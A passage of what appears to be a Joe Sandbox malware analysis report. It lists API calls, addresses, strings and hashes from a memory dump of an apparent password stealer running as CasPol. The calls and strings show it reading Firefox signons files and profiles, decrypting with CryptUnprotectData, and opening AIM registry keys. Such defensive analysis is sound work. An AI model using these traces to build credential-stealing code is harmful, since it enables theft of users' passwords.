                                                                                                                                                                                  • memset.MSVCRT ref: 00406596
                                                                                                                                                                                  • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                  • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                    • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                    • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                    • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                    • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                    • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                    • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                  • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                  • API String ID: 4081699353-561706229
                                                                                                                                                                                  • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                  • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                  • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                                                                                                                                                                  Function 0040FC4F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FC6B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FC82
                                                                                                                                                                                    • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                                                                                                                                                    • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                                                                                                                                                    • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040FCAD
                                                                                                                                                                                    • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                                                                                                                                                    • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                                                                                                                                                    • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040FCD5
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                  • API String ID: 748118687-1174173950
                                                                                                                                                                                  • Opcode ID: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                  • Instruction ID: 7f5679cf0a8b8ad9b854585c07a42444415b2697a37b1dd070144bca98095891
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6232208ba1a874a6dfbacdaeb12f5c4e8ca617f07066d97f4b76881872564654
                                                                                                                                                                                  • Instruction Fuzzy Hash: 67010CB3D4021C76DB2176655C86FCF7A2C5F60308F0408A6F548B7142D9BC9ED846A9
                                                                                                                                                                                  Function 0040C427 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$DeleteIconLoadObject
                                                                                                                                                                                  • String ID: ;@
                                                                                                                                                                                  • API String ID: 1986663749-2925476404
                                                                                                                                                                                  • Opcode ID: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                  • Instruction ID: 4d16bad446557b49ffcede9a37569aa771c04751a2fd478bf3dc9e82e5d405e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 462c25ec0a62c83cd232211add7106b677ed3de08da03debaff4362743836162
                                                                                                                                                                                  • Instruction Fuzzy Hash: A921AE70900314CBCB50AF6698846D97BA8BB01714F9886BFEC0DAF286CF7855408F68
                                                                                                                                                                                  Function 00404C9D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                                                  • API String ID: 145871493-1827663648
                                                                                                                                                                                  • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                  • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                                                                                                  Function 00411C8F Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00411CB8
                                                                                                                                                                                    • Part of subcall function 00406F2D: sprintf.MSVCRT ref: 00406F65
                                                                                                                                                                                    • Part of subcall function 00406F2D: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00406F78
                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411CDC
                                                                                                                                                                                  • memset.MSVCRT ref: 00411CF4
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,00417C88,?,00002000,?), ref: 00411D12
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3143880245-0
                                                                                                                                                                                  • Opcode ID: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                  • Instruction ID: 17bc1180ef60d6c0bde436c598d7e35c316bda315ace93708f1b6f060f7ed051
                                                                                                                                                                                  • Opcode Fuzzy Hash: a1c05242f935a5891b0258ea82ebdb7f25e17ebbf36daa8a397953fffb7df0c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0611A771500219BFDF115F64EC8AEDB3F78EF04754F100066FA09A2151E6358964CBA8
                                                                                                                                                                                  Function 0041208B Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                  • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                                                                                                  Function 00410D6F Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,004066D9), ref: 00410D78
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 00410D80
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectoryFreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2760881011-0
                                                                                                                                                                                  • Opcode ID: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                  • Instruction ID: c686a64e774c0d910729c20308bd6d7dac36cbeeda648e68b024901bbde96cda
                                                                                                                                                                                  • Opcode Fuzzy Hash: cded8f3f9ffc36de7afb34d45e755dd8b67c7cc5ec9fbb08d081a71ea3e3bd5e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DC00239000A01DFD7219FA0E808BE5BBF4BF48342FA8496DE1C581064E7799594CF48
                                                                                                                                                                                  Function 00404CE0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                  • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                  • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                                                                                                                                                                  Function 00411D68 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_33_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                                  • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                  • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                                                                                                                                                                  • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57